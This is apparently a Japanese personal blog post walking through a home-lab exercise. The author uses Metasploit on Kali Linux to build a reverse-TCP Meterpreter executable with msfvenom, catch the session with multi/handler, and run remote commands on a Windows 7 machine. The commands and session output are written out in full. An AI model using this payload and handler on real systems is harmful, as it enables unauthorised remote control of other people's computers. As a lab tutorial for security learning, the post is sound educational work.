明けましておめでとうございます。今年もよろしくお願いします!
30代未経験ネットワークエンジニアのshin@セキュリティエンジニアになるため勉強中です。
新年最初は、Metasploitを使ってWindows7を遠隔操作してみたと思います。
Metasploitとは、ペネトレーションテストや脆弱性診断で使用されるツールですので、自分の管理しているPCにのみ使用してください。
※Kali Linuxを使用します。もちろん悪用厳禁です!
流れ
- Kali Linuxでリバースシェルを行うためのEXEを作成
- Metasploitでシェルを待ち受ける
- Windows7でEXEを実行
- Kali LinuxでWindows7の情報を取得
今回の環境や、構成などは次のようになります。
環境
・ターゲットPC(Windows7)
・攻撃用PC(Kali Linux)
構成
・Kali Linux
IPアドレス:192.168.89.169
・Windows7
IPアドレス:192.168.89.157
今回の目的
ターゲットPCをMetasploitを使って攻撃して、ターゲットPCの「ipconfig」コマンドをKali Linuxで表示することまでやります。
それでは、実際にやっていきましょう。
手順
1.Kali Linuxの左のショーカットから「端末」を選択
2.Metasploitを起動するため、次のコマンドを実行
・msfconsole
3.ペイロードを作成するため、次のコマンドを実行(EXEを作成)
・msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.89.169 -f exe -o /root/windows7_test.exe
※LHOST:Kali LinuxのIPアドレスを入力
↓ 実行後に表示された結果
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.89.169 -f exe -o /root/windows7_test.exe[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload[-] No arch selected, selecting arch: x86 from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 341 bytesFinal size of exe file: 73802 bytesSaved as: /root/windows7_test.exe
4.作成した、「windows7_test.exe」ファイルをWindows7へコピーします
5.Kali Linuxでリバースシェルを待ち受けるためのコマンドを実行
・use exploit/multi/handler
・set payload windows/meterpreter/reverse_tcp
・set LHOST 192.168.89.169
ここまで、設定できたら「show options」コマンドで設定が間違っていないかを確認します。
・show options
↓結果はこんな感じ
6.問題なければ、先にWindows7側で「windows7_test.exe」を実行します。
※順番は7番が先でも問題ありません。
7. 「exploit」コマンドを実行
・exploit
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.89.169:4444
[*] Sending stage (179779 bytes) to 192.168.89.157
[*] Meterpreter session 1 opened (192.168.89.169:4444 -> 192.168.89.157:49159) at 2019-01-03 11:00:01 +0900
meterpreter >
8.「meterpreter>」が表示されていれば、Windows7とのセッションが確立しています。
※Windows7の「netstat」を前後で取得しました。
セッションが確立されていることが確認できます。
9.Windows7を遠隔操作してみます
Kali Liuxで以下のコマンドを入力してみましょう。
・getuid
・ls
・ifconfig
Windows7の現在のユーザが見れたり、カレントディレクトリ、IPアドレスの情報が確認できました。以上で、今回の目的を達成しましたのでこれで完了です。
補足
もしも、Windows7のコマンドプロンプトを表示したい場合は、「shell」と入力してみてください。
そうすると、普段使用しているコマンドプロンプト画面を表示することが出来ます。
元の状態に戻したい場合は、「exit」を入力
動画も取得しましのでよかったら是非見てください。
まとめ
今回は、Merasploitを使用して、Windows7のシェルを使用することが出来ました。
実際の攻撃とは違うと思いますが、少しでも参考になればと思います。
以上です。ありがとうございました。
今回の参考本です。
今回の内容よりも、もっと詳しいことが書いてあります。
コメント